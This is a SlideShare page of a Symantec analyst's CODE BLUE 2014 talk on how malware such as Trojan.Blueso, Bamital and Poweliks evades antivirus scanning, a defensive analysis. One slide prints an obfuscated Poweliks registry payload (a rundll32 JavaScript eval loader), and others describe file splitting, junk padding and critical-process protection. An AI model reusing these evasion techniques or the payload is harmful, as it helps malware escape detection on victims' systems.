SlideShare uma empresa Scribd logo

CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA

CODE BLUE
CODE BLUE

In this lecture, problems of existing antivirus software based of file scan will be discussed. For discussing the problem, latest methods of how attackers avoid the antivirus detection will be explained by dealing with a malware sample detected as Trojan.Blueso and by explaining with such as the construction of files and the principle of operation.

Tecnologia
1 de 32
Baixar para ler offline
How  malware  avoid  An/  Virus  scanning   Hiroshi  Shinotsuka   Threat  Analysis  Engineer
Self-­‐introduc/on   Copyright  ©  2014  Symantec  Corpora;on   2   •  Threat  analysis  engineer  in  Symantec.   •  Analyze  suspicious  file  and  create  An;-­‐Virus  signature   •  Provide  detailed  technical  descrip;on  to  customers  on   demand   •  Publically  provide  malware-­‐related  informa;on  
Copyright  ©  2014  Symantec  Corpora;on   3   24  hours  x  365  days  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   4  
Trojan.Blueso  detec/on Copyright  ©  2014  Symantec  Corpora;on   5   0   5,000   10,000   15,000   20,000   25,000   30,000   35,000   Trojan.Blueso   August   September   October   November  
Trojan.Blueso  file  structure   Copyright  ©  2014  Symantec  Corpora;on   6   RAR  self-­‐extrac/ng    file  13  MB   AutoIt     executable  file   Decryp;on  code   script  file Decryp;on  key   configura;on  file Encrypted  code AutoIt  is  a  programing  language  for  MicrosoW  Windows  plaYorm.  The  AutoIt   syntax  is  very  similar  to  that  of  BASIC  programing  language  and  is  designed  to   automate  the  Windows  GUI. RAR  self-­‐extrac;ng  file  drops  4   files,  then  it  execute  AutoIt   script  
Decrypted   code   Bluso  inject  Backdoor.Trojan   Copyright  ©  2014  Symantec  Corpora;on   7   Code   Decryp;on  key   Encrypted  code   Legi;mate    Windows  Process   Decryp;on   Part  of   Decrypted   code   Internet  Explorer   Process   Decry pted   code   AutoIt  executable  
Watch  Dog  monitor   Copyright  ©  2014  Symantec  Corpora;on   8   File  deleted   Process  deleted   Create  Process   Inject   Create  File   Trojan.Blueso  make  file/registry/process  again   if  An;virus  delete  it.  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   9  
Tradi/onal  sample   Copyright  ©  2014  Symantec  Corpora;on   10   Packer  /  Self  update   •  Harder  to  detect  encrypted  files.   •  Tradi;onal  sample  stored  all  informa;on  in  single  file. Code   Decryp;on  key   Encrypted   code Code   Decrypted   malicious  code  
New  technique  to  avoid  detec/on   Copyright  ©  2014  Symantec  Corpora;on   11   Tradi;onally  malware  saved  decrypted  image  to  a  file  and  executed.  An;virus   scanner  detects  malware  when  malware  saved  it  decrypted  image  onto  the   disk.   New  technique  is  to  inject  decrypted  image  to  a  new  running  process  and   executes  in  order  to  avoid  detec;on  by  file  scan.   Decrypted   malicious  code   Legi;mate    Windows  Process  Decrypt  in  memory   Decrypted   malicious  code  Code   Decryp;on  key   Encrypted  code AutoIt  executable  
File  detail   Copyright  ©  2014  Symantec  Corpora;on   12   Code   Decryp;on  key   Encrypted  code
An;Virus  scanner  scans  each  file.   Why  aBacker  split  malware  into  four  separate  files   Copyright  ©  2014  Symantec  Corpora;on   13   AutoIt  executable   Decryp;on  code   Decryp;on  key   Seeng  file Encrypted  code Scan   Scan   Scan   Scan  
What  does  this  mean?   •  Hiding  malicious  code  by  encryp;ng   •  Store  code,  decryp;on  key,  encrypted  code  in  separate  files.   •  An;virus  scanner  can’t  determine  ‘encrypted  code’  as  malicious   file.   •  An;virus  scanner  can’t  detect  the  file  without  understanding   rela;onships  between  mul;ple  files.   Copyright  ©  2014  Symantec  Corpora;on   14  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   15  
Code(Beginning  of  file)   Copyright  ©  2014  Symantec  Corpora;on   16   I  TAB  character  is  replaced  with  1  byte  string   You  only  see  junk  comment  lines  !  
Code  (Sample  1)   Copyright  ©  2014  Symantec  Corpora;on   17  
Code  (Sample  2)   Copyright  ©  2014  Symantec  Corpora;on   18  
Code   Copyright  ©  2014  Symantec  Corpora;on   19   Finally,  at  line  23670,  16MB  in  size,  important  code  is  reached.   87476  lines  of  AutoIt  script  codes.   Only  900  lines  without  comment  lines.   Only  1%  important  codes.
An/virus  scan  method   Copyright  ©  2014  Symantec  Corpora;on   20   •  An;virus  scanner  needs  to  have  balance  between  detec;on  and   performance   •  An;virus  scanner  first  determines  file  types  and  starts  file  scan   based  on  the  detected  file  type.   Executable  file ZIP  file JPEG  file
No  special  file  structure  in  text  file/script  file. Copyright  ©  2014  Symantec  Corpora;on   21   Script  files  have  no  file-­‐header,  which  means  the  files  have  no  special   file  structure.   An;virus  scanner  needs  to  run  a  par;al  scan  and  determine  what  the   file  is.   Very  difficult  to  keep  scan  performance  if  malicious  script  has  so  many   comment/junk  code.
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   22  
How  does  Blueso  start  and  protect  itself?   Copyright  ©  2014  Symantec  Corpora;on   23   Code   Decryp;on  key   Encrypted  code Legi;mate    Windows  Process   Decryp;on   Internet  Explorer   process   Malware  !! Malware  ?? What  is  wrong  ?? AutoIt   executable  
Process  protec/on  mechanism   Copyright  ©  2014  Symantec  Corpora;on   24   1)  Terminate  Internet  Explorer   -­‐>  Malicious  code  injected  into  Legi;mate  Windows  Process  is  executed  again   2)  Terminate  Legi;mate  Windows  Process   -­‐>  Running  script  on  AutoIt  execute  again   3)  Terminate  AutoIt  ?   -­‐>  Handle  AutoIt  executable  as  an  essen;al  process  for  Windows    system  by  using   undocumented  API  NtSetInforma;onProcess   As  soon  as  AutoIT  is  terminated,  Windows  determines  it  as  unrecoverable  cri;cal   problem.   -­‐>  Blue  Screen  Of  Death  !!  
Blue  Screen  Of  Death   Copyright  ©  2014  Symantec  Corpora;on   25  
ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   26  
Example  of  malware  store  code/data  in  irregular   place(Bamital)   Copyright  ©  2014  Symantec  Corpora;on   27   Set  registry  entry  to  start  a  code  when  windows  restarts.   HKEY_LOCAL_MACHINEsystemCurrentControlSetControlSession  Manager AppCertDlls"AppSecDll"  =   "%USER_Profile%Local  SeengsApplica;on  DataWindows  Serverxblscp.dll“   Because  of  analysis  already  performed,  xblscp.dll  is  determined  as  a  malicious  file.   Stricktly  speaking,  does  this  file  have  malicious  code  in  it?  
Example  of  malware  store  code/data  in  irregular  place   (Bamital)2   Copyright  ©  2014  Symantec  Corpora;on   28   How  it  works   •  Allocate  memory   •  Store  data  from  registry  to  the  allocated  memory •  Call  the  allocated  memory An;virus  scanner  doe  not  know  data  rule.  The  data  is  wriven  in   registry.   Another  malware  uses  same  technique  by  file.
Example  of  malware  store  code/data  in  irregular   place(Poweliks)   Copyright  ©  2014  Symantec  Corpora;on   29   Trojan.Poweliks  writes  a  Windows  Powershell  script  to  registry. You  can  find  this  registry  entry  may  execute  encrypted  java  script.   Encrypted  code  that  should  be  decrypted  in  different  registry  entry. HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{73E709EA-­‐5D93-­‐4B2E-­‐ BBB0-­‐99B7938DA9E4}LocalServer32(Default)  =   rundll32.exe  javascript:"..mshtml,RunHTMLApplica;on  ";eval("epdvnfou/xsjuf) (=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/ S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*, (=0tdsjqu?(*".replace(/./g,func;on(_){return %20String.fromCharCode(_.charCodeAt()-­‐1);}))   "a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@  
Conclusion   Copyright  ©  2014  Symantec  Corpora;on   30   •  Avackers  discover  new  techniques  every  day.   •  Avackers  employ  techniques  to  make  malware  removal  difficult   •  File  based  scanning  is  no  longer  effec;ve   •  Mul;-­‐layered  security  is  becoming  more  important  
&  Q   A   Copyright  ©  2014  Symantec  Corpora;on   31  
Thank  you!   Copyright  ©  2014  Symantec  Corpora/on.  All  rights  reserved.  Symantec  and  the  Symantec  Logo  are  trademarks  or  registered  trademarks  of  Symantec  Corpora;on  or  its  affiliates   in  the  U.S.  and  other  countries.    Other  names  may  be  trademarks  of  their  respec;ve  owners.   This  document  is  provided  for  informa;onal  purposes  only  and  is  not  intended  as  adver;sing.    All  warran;es  rela;ng  to  the  informa;on  in  this  document,  either  express  or   implied,  are  disclaimed  to  the  maximum  extent  allowed  by  law.    The  informa;on  in  this  document  is  subject  to  change  without  no;ce.   Hiroshi  Shinotsuka  

Recomendados

An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition
Fraunhofer AISEC
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
Vi Tính Hoàng Nam
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hacking
Vi Tính Hoàng Nam
 
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Student
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
CODE BLUE
 

Recomendados

An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition An Antivirus API for Android Malware Recognition
An Antivirus API for Android Malware Recognition
Fraunhofer AISEC
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
Vi Tính Hoàng Nam
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Ceh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hackingCeh v5 module 01 introduction to ethical hacking
Ceh v5 module 01 introduction to ethical hacking
Vi Tính Hoàng Nam
 
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Signature Free Virus Blocking Method to Detect Software Code Security (Intern...
Student
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
CODE BLUE
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
Antonio Parata
 
.NET for hackers
.NET for hackers.NET for hackers
.NET for hackers
Antonio Parata
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networks
Vi Tính Hoàng Nam
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and worms
Asep Sopyan
 
Verification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresVerification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP Cores
IRJET Journal
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
Asep Sopyan
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense Firewall
Huda Seyam
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
Asep Sopyan
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
Dilum Bandara
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New World
North Texas Chapter of the ISSA
 
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Positive Hack Days
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
Greater Noida Institute Of Technology
 
Ids & ips
Ids & ipsIds & ips
Ids & ips
Lan & Wan Solutions
 
Ceh v5 module 00 student introduction
Ceh v5 module 00 student introductionCeh v5 module 00 student introduction
Ceh v5 module 00 student introduction
Vi Tính Hoàng Nam
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
Cisco DevNet
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheet
David Sweigert
 
Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)
SURBHI SAROHA
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
Thomas Roccia
 
Security in network
Security in networkSecurity in network
Security in network
DaNang University of Technology
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
ISSA LA
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
Lastline, Inc.
 

Mais conteúdo relacionado

Mais procurados

Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Positive Hack Days
 

Mais procurados (20)

HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
.NET for hackers
.NET for hackers.NET for hackers
.NET for hackers
 
Ceh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networksCeh v5 module 15 hacking wireless networks
Ceh v5 module 15 hacking wireless networks
 
Ceh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and wormsCeh v8 labs module 07 viruses and worms
Ceh v8 labs module 07 viruses and worms
 
Verification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP CoresVerification of Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP Cores
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense Firewall
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New World
 
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
Exploiting Redundancy Properties of Malicious Infrastructure for Incident Det...
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Ids & ips
Ids & ipsIds & ips
Ids & ips
 
Ceh v5 module 00 student introduction
Ceh v5 module 00 student introductionCeh v5 module 00 student introduction
Ceh v5 module 00 student introduction
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheet
 
Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)Confidentiality policies UNIT 2 (CSS)
Confidentiality policies UNIT 2 (CSS)
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
 
Security in network
Security in networkSecurity in network
Security in network
 

Semelhante a CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA

Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Roberto Sponchioni
 

Semelhante a CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA (20)

Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablow
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
ransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptxransomware keylogger rootkit.pptx
ransomware keylogger rootkit.pptx
 
WannaCry: How to Protect Yourself
WannaCry: How to Protect YourselfWannaCry: How to Protect Yourself
WannaCry: How to Protect Yourself
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdf
 
Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets Threat Landscape Lessons from IoTs and Honeynets
Threat Landscape Lessons from IoTs and Honeynets
 
Applying formal methods to existing software by B.Monate
Applying formal methods to existing software by B.MonateApplying formal methods to existing software by B.Monate
Applying formal methods to existing software by B.Monate
 
Cyber security webinar 6 - How to build systems that resist attacks?
Cyber security webinar 6 - How to build systems that resist attacks?Cyber security webinar 6 - How to build systems that resist attacks?
Cyber security webinar 6 - How to build systems that resist attacks?
 
Securing your Cloud Environment
Securing your Cloud EnvironmentSecuring your Cloud Environment
Securing your Cloud Environment
 
D-Cipher
D-CipherD-Cipher
D-Cipher
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Ch07.ppt
Ch07.pptCh07.ppt
Ch07.ppt
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
 
Paper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devicesPaper sharing_Edge based intrusion detection for IOT devices
Paper sharing_Edge based intrusion detection for IOT devices
 
Understanding Keylogger
Understanding KeyloggerUnderstanding Keylogger
Understanding Keylogger
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of Things
 

Mais de CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
CODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
CODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
